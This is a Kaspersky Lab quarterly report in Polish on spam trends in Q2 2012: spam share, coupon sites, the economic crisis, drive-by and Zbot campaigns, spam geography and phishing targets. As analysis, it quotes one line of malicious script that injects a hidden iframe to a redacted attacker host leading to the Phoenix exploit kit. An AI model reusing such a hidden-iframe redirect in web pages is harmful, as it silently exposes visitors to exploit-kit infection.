Daria Gudkowa
Ekspert z Kaspersky Lab

Maria Namiestnikowa
Ekspert z Kaspersky Lab

• Kwartał w liczbach
• Kupony a spam: spadek udziału spamu
• Spam a sytuacja gospodarcza
  • Zmiany w kategoriach spamu
  • Szkodliwy spam
    • Spam Drive-by
    • Szkodliwe oprogramowanie Wiki
    • Szkodliwi podróżnicy
• Gorące tematy spamowe
  • Spam prezydencki
  • Oszustwo tematyczne
• Geografia spamu
  • Źródła spamu według państwa
  • Źródła spamu według regionu
• E-maile ze szkodliwymi załącznikami
  • Poziom wykrywania szkodliwego oprogramowania w poczcie e-mail dla różnych państw.
  • Top 10 szkodliwych programów rozprzestrzenianych za pośrednictwem ruchu pocztowego
• Phishing
• Podsumowanie

Kwartał w liczbach

• W II kwartale 2012 r. udział spamu w ruchu pocztowym zmniejszył się o 2,3 punktu procentowego w porównaniu z poprzednim kwartałem i wynosił średnio 74,3%.
• Największym źródłem spamu pozostaje Azja (53%) i Ameryka Łacińska (14%).
• Odsetek wiadomości e-mail ze szkodliwymi załącznikami zmniejszył się o 0,3 punktu procentowego w porównaniu z I kwartałem 2012 r. i wynosił średnio 3%.

Kupony a spam: spadek udziału spamu

W II kwartale 2012 r. odsetek spamu w ruchu pocztowym nadal spadał i ostatecznie wynosił średnio 74,3% - o 2,3 proc. mniej niż w poprzednim kwartale.

Udział spamu w ruchu pocztowym w II kwartale 2012 r.

Spadek udziału spamu w ruchu pocztowym jest w pewnym stopniu zjawiskiem sezonowym: wiele komputerów stanowiących boty spamowe jest wyłączonych w czasie, gdy ich właściciele przebywają na wakacjach. Z drugiej strony, równie dobrze możemy mieć do czynienia z ogólną tendencją spadkową w ilości spamu, ponieważ w tzw. "spokojnym" okresie spada również poziom "czystego" ruchu e-mail. Tak więc obserwowany spadek w ruchu spamowym nie jest spowodowany jedynie wahaniami sezonowymi.

Kilka lat temu w internecie pojawiły się nowe projekty online oferujące użytkownikom zbiorowe zniżki, czyli tzw. kupony. Kupon upoważnia użytkownika do zniżki podczas zakupu towarów lub usług. Serwisy kuponowe szybko zyskały popularność na całym świecie: wiele firm wykorzystuje je w celu rozszerzenia swojej bazy klientów, z kolei klienci polują na nich na najlepsze oferty.

Spamerzy nie mogli zignorować wpływu serwisów kuponowych na ruch e-mail oraz reklamę internetową.

Zachodni spam jest wykorzystywany przez uczestników programów partnerskich, z których lwia część oferuje nielegalne towary lub usługi. Jednak ruch pocztowy zawiera również wysyłki rozprzestrzeniane za pośrednictwem programów partnerskich, które reklamują legalne towary (pamiątki, kwiaty itd.), jak również wiadomości spamowe, które nie mają nic wspólnego z programami partnerskimi.

Serwisy kuponowe odegrały podwójną rolę w zachodnim spamie - po pierwsze, spamerzy wykorzystali wysyłki "oferujące kupony" w celu przyciągnięcia uwagi potencjalnych ofiar. Jednocześnie, system kuponowy zawłaszczył część legalnej reklamy zawartej wcześniej w spamie. Nie powinno to nikogo dziwić - serwisy kuponowe są legalne, a ten rodzaj reklamy jest skuteczniejszy. Takie e-maile nie są blokowane przez filtry spamowe i trafiają do odbiorców zainteresowanych promocjami na serwisach kuponowych. W efekcie ilość wysyłek spamowych w zachodnim ruchu pocztowym zmniejszyła się.

W państwach, w których serwisy kuponowe są popularne, a odsetek spamu jest większy niż odsetek promocji oferowanych za pośrednictwem programów partnerskich, kupony miały jeszcze większy wpływ na spam. Wiele firm, które wcześniej wykorzystywały spam jako główne narzędzie reklamowe, albo całkowicie skupiło się na serwisach kuponowych, albo przymierza się do tego. Można przyjąć, że w Rosji biura podróży niemal całkowicie zaprzestają zlecania kampanii spamowych i wykorzystują teraz serwisy kuponowe. W II kwartale 2012 r. udział spamu z kategorii "Podróże i turystyka" w segmencie RuNet stanowił, mimo sezonu wakacyjnego, zaledwie ponad 1%. Jednocześnie, około 10% wszystkich ofert rosyjskich serwisów kuponowych to oferty firm turystycznych oraz agencji podróży.

Im częściej pojawiają się tego rodzaju projekty, tym większe prawdopodobieństwo, że reklamodawcy przerzucą się na programy kuponowe - zacięta konkurencja skłania serwisy kuponowe do oferowania korzystniejszych warunków dla firm. Z drugiej strony, serwisy te mogą w końcu zostać zmuszone do wykorzystywania spamu w celu promowania swoich projektów i poszerzenia grona ich odbiorców.

Zmniejszenie się udziału spamu w całkowitym ruchu pocztowym może mieć również związek z trudną sytuacją gospodarczą na świecie.

Spam a sytuacja gospodarcza

Zmiany w kategoriach spamu

Niezwykle niski poziom wysyłek e-mail z kategorii "Podróże i turystyka" w rosyjskojęzycznym spamie wynika nie tylko z pozytywnego trendu polegającego na tym, że reklamodawcy przechodzą na wykorzystywanie legalnej platformy reklamowej. Jest to również jeden z niepokojących symptomów globalnej sytuacji gospodarczej. Problem leży w tym, że wiele małych i średnich rosyjskich biur podróży już zaczęło "tonąć" w nowej fali kryzysu gospodarczego - co nieuchronnie doprowadziło do spadku działalności reklamowej, łącznie ze spamem.

Wpływ na spam mają również inne oznaki kryzysu. W maju, na przykład, zaczęła wzrastać ilość angielskojęzycznego spamu promującego usługi z kategorii finansów osobistych. W tym czasie odsetek tego rodzaju niechcianych wiadomości stanowił 23,5% ogółu spamu - miesiąc później wzrósł trzykrotnie i wynosił 73%. W czerwcu większość takich wiadomości zawierała oferty nielegalnych dochodów. To samo można powiedzieć o niemieckojęzycznym spamie - przez ostatnie kilka miesięcy liczba podejrzanych ofert pracy rosła. Podobne zmiany można było zaobserwować w czasie kryzysu gospodarczego w latach 2008-2009.

Kryzys gospodarczy w Europie spowodował wzrost poziomu spamu z kategorii nieruchomości na rosyjskojęzycznym rynku. W lutym 2012 r. odsetek takich niechcianych wiadomości zwiększył się z 5,5% do 9,2%. Miesiąc później spam ten stanowił ponad 15% wszystkich niechcianych wiadomości w rosyjskim segmencie internetu (RuNet), a w kwietniu wynosił prawie 20%.

Ostatni nieoczekiwany wzrost liczby wiadomości spamowych z kategorii "Nieruchomości" został zarejestrowany w RuNecie w latach 2008-2009 w okresie globalnego kryzysu finansowego. W tym czasie otoczenie rynkowe było nieco inne i udział tej kategorii spamu zwiększył się z 2-3% do 7-8%.

Wzrost udziału kategorii "Nieruchomości" na tle spadku ogólnego poziomu spamu wskazuje na znaczny wzrost ilości reklam nieruchomości w rosyjskim spamie. Wiele z takich ofert dotyczy nieruchomości w takich państwach jak Hiszpania, które same zmagają się z poważnymi problemami gospodarczymi. Wynika to z tego, że drobni inwestorzy zwykle sprzedają nieruchomości, kiedy przewidywany jest spadek cen. Rosyjskojęzyczny spam pozostaje najtańszym sposobem reklamowania takich ofert sprzedaży.

W II kwartale 2012 r. oszuści zaczęli wykorzystywać kryzys zarówno w celu zwrócenia uwagi na tradycyjne wysyłki dystrybuowane za pośrednictwem programów partnerskich, jak i reklamowania podejrzanie tanich pożyczek. Ponadto, angielsko i rosyjskojęzyczne wiadomości e-mail zapraszały do udziału w seminariach na temat globalnego kryzysu gospodarczego, w szczególności w strefie Euro.

 

Szkodliwy spam

Jeżeli trudna sytuacja gospodarcza doprowadzi do powtórki scenariusza z lat 2008-2009, w nadchodzących miesiącach powinniśmy spodziewać się wzrostu poziomu oszukańczego i szkodliwego spamu. W świetle tej prognozy warto omówić kilka sztuczek spamerskich wykorzystywanych do dystrybucji szkodliwego kodu. Metody te obejmują zarówno nowe techniki jak i kilka starych, ulubionych trików spamerów.

Spam Drive-by

Powszechnie wiadomo, że szkodliwy spam występuje nie tylko w postaci załączników, ale również niebezpiecznych odsyłaczy. Warto wiedzieć, że kliknięcie jednego z takich odsyłaczy może doprowadzić do zainfekowania komputera - z czego jego właściciel może w ogóle nie zdawać sobie sprawy. Wynika to z tego, że odsyłacze te przekierowują do różnych stron zawierających pakiety exploitów, czyli zestawy procedur, których celem jest znalezienie luk w popularnych aplikacjach i systemach operacyjnych.

W II kwartale 2012 r. odsetek wysyłek wykorzystywanych do przeprowadzania ataków drive-by był szczególnie wysoki. Poniżej przedstawiamy konkretne przykłady ilustrujące ogólne działanie takich ataków.

1. Użytkownik otrzymuje fałszywe powiadomienie z popularnego zasobu, e-mail wyglądający na oficjalną wiadomość, mailing informacyjny, a nawet wiadomość od znajomej osoby. Wszystkie te wiadomości łączy to, że zachęcają użytkownika do kliknięcia odsyłacza. Bardzo często zawierają tekst namawiający użytkownika do kliknięcia odsyłacza "jak najszybciej" lub "niezwłocznie".
 
2. Po kliknięciu odsyłacza użytkownik ląduje na stronie ze zintegrowanym zaciemnionym skryptem (w wiadomości powyżej skrypt ten został wykryty przez Kaspersky Anti-Virus jako Trojan.Script.Generic). Zadaniem skryptu jest przekierowywanie użytkownika na szkodliwą stronę przy pomocy znacznika iframe.

Oto część początkowego kodu:

document.write (s)  <iframesrc='http://r*****d.su:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Na stronie wyświetla się komunikat "Loading...Please Wait..."

3. W tym konkretnym przypadku użytkownik jest przekierowywany na stronę z pakietem exploitów Phoenix. Innym razem odsyłacze mogą prowadzić do pakietu exploitów Blackhole. Po przekierowaniu komputer użytkownika jest atakowany przez exploity wykorzystujące luki w takim oprogramowaniu jak Java, Flash Player lub Adobe Reader. Jeżeli oszuści będą mieli szczęście (tj. przynajmniej jedna z wymienionych wyżej aplikacji zainstalowanych na komputerze użytkownika będzie podatna na ataki), na komputer ofiary zostanie pobrany plik wykonywalny. Plik ten kontaktuje się z centrum kontroli i pobiera inne szkodliwe programy na komputer.

Szkodliwe oprogramowanie Wiki

W kwietniu wykryliśmy spam, który imitował oficjalne powiadomienie z Facebooka. Tym razem jednak, zawarte w wiadomościach e-mail odsyłacze nie przenosiły użytkowników na zhakowane domeny lub strony, ale na strony Wikipedii oraz Amazona. Najwyraźniej, szkodliwi użytkownicy zaszyli szkodliwy skrypt w utworzonych przez siebie stronach Wikipedii, jak również w stronach, które miały przypominać reklamy używanych przedmiotów wystawionych na portalu Amazon.com. Dlaczego "najwyraźniej"? Ponieważ taktyka ta okazała się niezbyt efektywna. Obsługa obu stron zareagowała szybko i zanim rozprzestrzeniono odsyłacze, zainfekowane strony zostały wyłączone.

 

Szkodliwi podróżnicy

Dystrybutorzy szkodliwych wiadomości e-mail nieustannie udoskonalają metody socjotechniki wykorzystywane w celu prowadzenia swojej oszukańczej aktywności. Na przykład, w II kwartale rozprzestrzeniali masowe wysyłki oferujące pełny szkodliwy "pakiet turystyczny" poświęcony podróżom i turystyce - akurat przed rozpoczęciem się sezonu wakacyjnego.

Najpierw pojawiły się fałszywe powiadomienia od linii lotniczych. W pierwszym kwartale 2012 r. użytkowników zachęcano do dokonania odprawy online przed lotem liniami US Airways, natomiast w drugim kwartale w podobnym triku wykorzystano British Airways.

 

Oprócz lotów spamerzy wykorzystywali również rezerwacje hotelowe. Zarejestrowaliśmy masową wysyłkę rzekomo wysłaną w imieniu booking.com. Wiadomości prosiły użytkowników o potwierdzenie rezerwacji hotelowej i zawierały szkodliwy załącznik wykrywany przez Kaspersky Anti-Virus jako Trojan-Spy.Win32.Zbot.

 

Wiadomość nie wygląda na autentyczną i z wyjątkiem fałszywego pola FROM nie ma nic wspólnego z oryginalnym e-mailem od booking.com. Jednak portale rezerwacyjne cieszą się dużą popularnością latem i nie wszyscy klienci zwracają uwagę na szczegóły. Dlatego nawet słaba imitacja strony może zwabić wiele ofiar.

Warto pamiętać, że poważne firmy nie wysyłają potwierdzeń w formie archiwum ZIP. Ponadto, w razie wątpliwości co do autentyczności wiadomości e-mail zawsze można skontaktować się z firmą za pomocą danych kontaktowych podanych na jej oficjalnej stronie.

Gorące tematy spamowe

Spam prezydencki

Nie będzie przesadą stwierdzenie, że w II kwartale 2012 r. Barack Obama był osobą cieszącą się największą popularnością wśród spamerów. Wykryliśmy mnóstwo wiadomości, w których wymienione było jego nazwisko. Większość z nich to e-maile krytykujące nowe ustawy zatwierdzone przez prezydenta. Wiadomości te były dobrze zaprojektowane i wzywały odbiorców do przyłączenia się do protestu przeciwko działaniom Obamy. Zawierały również prośbę o przelanie pieniędzy na konta kilku oficjalnych organizacji amerykańskich.

 

Co ciekawe, w Stanach Zjednoczonych spam polityczny i niekomercyjny nie podlega pod ustawę CAN-SPAM Act, co oznacza, że oficjalne organizacje rzeczywiście mogły wysłać takie wiadomości.

Pojawiły się również wysyłki wykorzystujące nazwisko Obamy, które naruszały amerykańskie prawo antyspamowe. Podczas analizy wiadomości z tematem "Obama is caught on a hottie" reklamujących nielegalne farmaceutyki lub podrabiane towary znanych projektantów przypomniały nam się bardzo podobne e-maile sprzed prawie czterech lat. W tym czasie, niedługo po wyborze Obamy na prezydenta, jego nazwisko pojawiało się w niemal każdej wysyłce spamowej z takimi tematami jak: "Obama has revealed his secrets" [Obama zdradził swoje sekrety] czy "Obama is a woman! [Obama jest kobietą]"! Wygląda na to, że spamerzy wrócili do swoich starych sztuczek, żerując na powszechnym zainteresowaniu wyborami prezydenckimi w Stanach Zjednoczonych tej jesieni.

Również wyścig o fotel prezydenta we Francji miał wpływ na tematy spamu w II kwartale. Ruch e-mail zawierał masowe wysyłki dotyczące kandydatów, jednak nie były one zbyt liczne. Tak jak wspominaliśmy w naszym kwietniowym raporcie spamowym, francuskie wiadomości spamowe oferowały w szczególności t-shirty z hasłami popierającymi Sarkozy'ego. Nie było jednak żadnej kampanii na rzecz Francoisa Hollande'a, nowo wybranego prezydenta Francji.

Oszustwo tematyczne

Sytuacja w Syrii stanowiła temat wiadomości wysyłanych przez "nigeryjskich" spamerów od kwietnia. Na naszym blogu pisaliśmy już o e-mailach pochodzących rzekomo od "żony Assada". Podobne wiadomości pojawiały się przez cały kwartał. Jednak twórczy spamerzy nie ograniczyli się do jednego schematu i wysyłali również e-maile od "członków rodziny Assada" oraz zwykłych Syryjczyków.

 

Jednym z najważniejszych wydarzeń II kwartału były czerwcowe Mistrzostwa w Piłce Nożnej Euro 2012. Następnie w centrum uwagi spamerów znalazły się Igrzyska Olimpijskie w Londynie: spamerzy powiadamiali o wygranych na loterii zorganizowanej rzekomo przez Fundację Olimpijską. Im bliżej Igrzysk Olimpijskich, tym większą aktywność wykazywali spamerzy.

Geografia spamu

Źródła spamu według państwa

W II kwartale 2012 r. rozkład geograficzny spamu według państwa zmienił się znacząco. Prowadzenie nieoczekiwanie objęły Chiny - z terytorium tego pochodziło 19% całego spamu. Po długiej przerwie w trójce największych spamerów ponownie znalazły się Stany Zjednoczone, które uplasowały się na drugim miejscu wraz z Indiami, dystrybuując tę samą ilość spamu (11,7%).

 
Źródła spamu według kraju w II kwartale 2012 r.

W poprzednim kwartale pisaliśmy o relokacji botnetów i możliwych zmianach w rozkładzie geograficznym spamu. Nie spodziewaliśmy się jednak tak drastycznych przesunięć. Kilka lat temu Chiny znajdowały się wśród liderów pod względem dystrybucji niechcianych wiadomości, jednak po przyjęciu prawa antyspamowego w 2006 roku ilość wiadomości śmieci rozprzestrzenianych z tego terytorium znacznie zmniejszyła się. Być może sześć lat później spamerzy zapomnieli o tym prawie, zwłaszcza że nie jest ono aktywnie egzekwowane.

Ogólnie jednak, powrót Chin i Stanów Zjednoczonych do czołówki rankingu nie powinien zaskakiwać: dobry dostęp do internetu i ogromna liczba komputerów, które mogą zostać zainfekowane botami i użyte do dystrybucji spamu przyciągają spamerów.

Mimo relokacji źródeł spamu główne trendy nie zmieniły się: więcej spamu pochodzi z Azji i Ameryki Łacińskiej. W II kwartale 2012 r. na liście Top 20 największych źródeł spamu znalazło się dziewięć państw azjatyckich, pięć państw z Ameryki Łacińskiej i tylko po jednym z Europy Zachodniej (Wielka Brytania) i Europy Wschodniej (Rosja).

Wyraźnie widać, że spam napływa do różnych regionów z różnych państw. Na przykład, państwa Europy Wschodniej odnotowują więcej spamu z Chin (Chiny wysyłają znacznie mniej spamu do innych regionów, a na wysoką pozycję tego państwa w światowym rankingu spamerów ma wpływ spam atakujący Europę), podczas gdy państwa Europy Wschodniej są "atakowane" przez spam indyjski, a spam przychodzący do Ameryki Północnej w większości pochodzi ze Stanów Zjednoczonych.

Źródła spamu według regionu

 
Źródła spamu według regionu w II kwartale 2012 r.

Jak pokazuje diagram, większość globalnego spamu pochodzi z Azji. Region ten stanowi wieloletniego lidera w dystrybucji spamu, a w II kwartale jego udział wzrósł jeszcze bardziej. W dużej mierze spowodowane to było wzrostem aktywności w Chinach, w rezultacie czego państwo to stanowiło największe źródło globalnego spamu.

Wzrosła również ilość spamu rozprzestrzenianego z Ameryki Północnej. Większość została wysłana ze Stanów Zjednoczonych, innego byłego lidera rankingu. Dwa lata temu zamknięto kilka centrów dużych botnetów, co spowodowało spadek ilości spamu pochodzącego z tego państwa. Teraz spamerzy znów zaczęli tworzyć botnety w Stanach Zjednoczonych. Nie ma w tym nic dziwnego, biorąc pod uwagę ogromną liczbę użytkowników internetu, których komputery mogą zostać zainfekowane.

Dynamika dystrybucji spamu według regionu w II kwartale 2012 r.

Jeżeli chodzi o inne regiony, ilość spamu wychodzącego z Europy Zachodniej i Wschodniej nadal zmniejszała się.

E-maile ze szkodliwymi załącznikami

W II kwartale 2012 r. średni odsetek wiadomości e-mail ze szkodliwymi załącznikami zmniejszył się o 0,3 punktu procentowego i wynosił 3%. Wykres poniżej pokazuje rozkład szkodliwego spamu w poszczególnych miesiącach.

Odsetek spamu ze szkodliwymi załącznikami w II kwartale 2012 r.

Jak widać na wykresie, zmiany w odsetku szkodliwego spamu w II kwartale były nieznaczne.

Warto przypomnieć, że w celu rozprzestrzeniania szkodliwego oprogramowania spamerzy wykorzystują zarówno szkodliwe załączniki, jak i szkodliwe odsyłacze. Dlatego też spadek liczby szkodliwych załączników w ruchu pocztowym nie zawsze wskazuje na spadek udziału szkodliwych wysyłek.

Poziom wykrywania szkodliwego oprogramowania w poczcie e-mail dla różnych państw

Współczynniki wykrywania szkodliwego oprogramowania w poczcie e-mail dla różnych państw w II kwartale 2012 r. kształtowały się następująco:

 
Współczynniki wykrywania szkodliwego oprogramowania w poczcie e-mail w II kwartale 2012 r.

Ogólnie, ranking ze względu na ilość wykrytego szkodliwego oprogramowania w poczcie e-mail dla różnych państw prawie nie zmienił się w porównaniu z poprzednim kwartałem: w rankingu utrzymało się dziewięć państw z pierwszej 10, zamieniając się jedynie miejscami. Również niewielkie zmiany odnotowano w odsetkach szkodliwych programów wykrytych w poczcie e-mail na terytoriach państw z pierwszej 10 - odsetki te wahały się w granicach 2 punktów procentowych w przypadku wszystkich państw z wyjątkiem specjalnego regionu administracyjnego Hong Kongu.

Hong Kong, który w pierwszym kwartale znalazł się na 2 miejscu, w II kwartale wypadł z pierwszej piątki (w państwie tym odsetek szkodliwego oprogramowania w poczcie e-mail wynosił 4,8%, o 4 punkty procentowe mniej niż w poprzednim kwartale).

Już szósty miesiąc z rzędu Stany Zjednoczone znalazły się na szczycie rankingu wykrywania szkodliwego oprogramowania w poczcie e-mail. W II kwartale odsetek wykrytych szkodliwych programów w wiadomościach e-mail w tym państwie wzrósł o 2 punkty procentowe w porównaniu z poprzednim kwartałem. Wielka Brytania i Niemcy znalazły się na 2 i 3 miejscu, odnotowując odpowiednio wzrost o 2 i 1,4 punkty procentowe.

Top 10 szkodliwych programów rozprzestrzenianych za pośrednictwem ruchu pocztowego

Trojan-Spy.HTML.Fraud.gen pozostał najszerzej rozprzestrzenianym szkodliwym programem w I kwartale 2012 r., odpowiadając za 12,5% wszystkich wykrytych szkodliwych programów, o 2 punkty procentowe mniej niż w poprzednim kwartale. Trojan ten wykorzystuje technologię spoofingu i imituje stronę HTML. Występuje w wiadomości phishingowej zawierającej odsyłacz do fałszywej strony przypominającej stronę znanego banku lub systemu e-płatności, na której użytkownik jest proszony o podanie loginu i hasła. Dane podawane na takiej stronie są wysyłane cyberprzestępcom.

 
Top 10 szkodliwych programów dystrybuowanych za pośrednictwem ruchu pocztowego w II kwartale 2012 r.

Robaki pocztowe nadal znajdują się wśród najstarszych weteranów rankingu Top10. Na drugim miejscu po raz kolejny uplasował się Email-Worm.Win32.Mydoom.m. Robak ten, jak również podobny do niego Mydoom.l (na 9 miejscu), posiada tylko dwie funkcje - zbieranie adresów e-mail oraz wysyłanie na nie swoich kopii. Email-Worm.Win32.NetSky (na 5 miejscu) posiada tę samą funkcjonalność. Email-Worm.Win32.Bagle.gt, kolejny robak pocztowy (na 3 miejscu w rankingu), pobiera oprócz tego szkodliwe programy z internetu.

Packed.Win32.Katusha.o, który w czerwcowym rankingu uplasował się na drugim miejscu, w II kwartale znalazł się na 6 pozycji. Pakery z tej rodziny regularnie pojawiają się w tym rankingu Top10. Programy te są wykorzystywane do pakowania innych szkodników (w większości fałszywych programów antywirusowych) w celu obejścia wykrywania antywirusowego.

Phishing

W drugim kwartale 2012 r. liczba ataków na użytkowników portali społecznościowych stanowiła ponad jedną czwartą wszystkich ataków phishingowych.

 
Top 100 organizacji, według sfery aktywności, atakowanych przez phisherów w II kwartale 2012 r. (na podstawie statystyk wykrywania dostarczonych przez komponent antyphishingowy)

Ranking ten opiera się na statystykach wykrywania dostarczonych przez komponent antyphishingowy oprogramowania Kaspersky Lab aktywowany za każdym razem, gdy użytkownik próbuje kliknąć odsyłacz phishingowy, niezależnie od tego czy odsyłacz ten znajduje się w wiadomości spamowej czy na stronie internetowej.

W II kwartale 2012 r. kategoria "portale społecznościowe" wyprzedziła "organizacje finansowe", "e-płatności" oraz "banki" w rankingu najatrakcyjniejszych celów phishingowych. Miało to związek z początkiem letnich wakacji dla szkół i uczelni wyższych, gdy wielu studentów i uczniów spędza więcej czasu w internecie. Tacy użytkownicy prawdopodobnie nie posiadają kont bankowych online. W okresie tym zmniejsza się również aktywność biznesowa, co prowadzi do spadku w intensywności ataków na organizacje finansowe. Z drugiej strony, pozostają one najbardziej dochodowymi celami dla cyberprzestępców. To dlatego ich udział, mimo spadku, utrzymał się na bardzo wysokim poziomie.

Podsumowanie

Ilość spamu zmniejsza się. Jest to spowodowane kilkoma czynnikami: sezonowymi (wiele komputerów-botów spamowych jest wyłączonych w czasie, gdy ich właściciele przebywają na wakacjach), ekonomicznymi (na spam wpływają zagrożenia związane z kryzysem gospodarczym) oraz konkurencyjnymi (niektórzy reklamodawcy rezygnują z usług spamerów i stają się klientami serwisów kuponowych). Przewidujemy dalsze spadek udziału spamu nawet po zakończeniu sezonu wakacyjnego wraz z pogarszaniem się sytuacji gospodarczej. Spodziewamy się również stopniowego zmniejszania się odsetka spamu, który w następnym roku może spaść do poziomu 65% całkowitego ruchu pocztowego.

Zmieniła się również geografia źródeł spamu. Szkodliwi użytkownicy są zainteresowani państwami, w których istnieje dobre połączenie z internetem oraz duża liczba użytkowników, dlatego przenieśli swoje botnety do Chin i Stanów Zjednoczonych - państw, które obecnie rozprzestrzeniają największą ilość spamu. Chociaż przewidywaliśmy zmiany w rozkładzie źródeł spamu, nie spodziewaliśmy się ich tak szybko. Z drugiej strony, utrzymała się tendencja wzrostu odsetka spamu rozprzestrzenianego z Azji i Ameryki Łacińskiej.

Nie bez powodu poświęcamy tak dużo czasu na opis sztuczek wykorzystywanych przez spamerów w celu rozprzestrzeniania szkodliwego kodu. Nasze doświadczenie w monitorowaniu spamu w czasie kryzysu w latach 2008-2009 pokazuje, że zauważalny wzrost udziału szkodliwego oprogramowania w ruchu pocztowym jest niemal gwarantowany. To oznacza, że spam będzie o wiele bardziej niebezpieczny. W ostatnich latach cyberprzestępcy znacznie rozszerzyli swój arsenał, który jest aktualizowany o nowe metody socjotechniki niemal każdego miesiąca.

Źródło: Kaspersky Lab